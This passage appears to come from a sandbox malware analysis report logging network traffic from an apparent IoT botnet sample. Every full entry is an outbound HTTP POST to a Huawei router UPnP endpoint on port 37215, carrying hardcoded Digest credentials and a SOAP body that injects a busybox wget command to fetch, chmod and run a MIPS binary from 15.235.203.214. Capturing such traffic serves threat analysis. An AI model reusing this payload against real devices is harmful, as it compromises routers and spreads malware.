6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      53192.168.2.2357502157.189.184.17137215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221646070 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      54192.168.2.2355506157.6.221.9937215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221726894 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      55192.168.2.234768441.214.148.21437215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221735001 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      56192.168.2.234772841.6.98.7037215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221748114 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      57192.168.2.233945657.35.73.12637215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221748114 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      58192.168.2.2353842197.55.83.12237215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221790075 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      59192.168.2.2356808197.138.137.21737215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221790075 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      60192.168.2.234352061.117.29.15537215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221801996 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      61192.168.2.2350602157.15.115.23237215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221802950 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      62192.168.2.233674641.173.160.1437215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221802950 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      63192.168.2.235323046.47.224.13237215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221802950 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
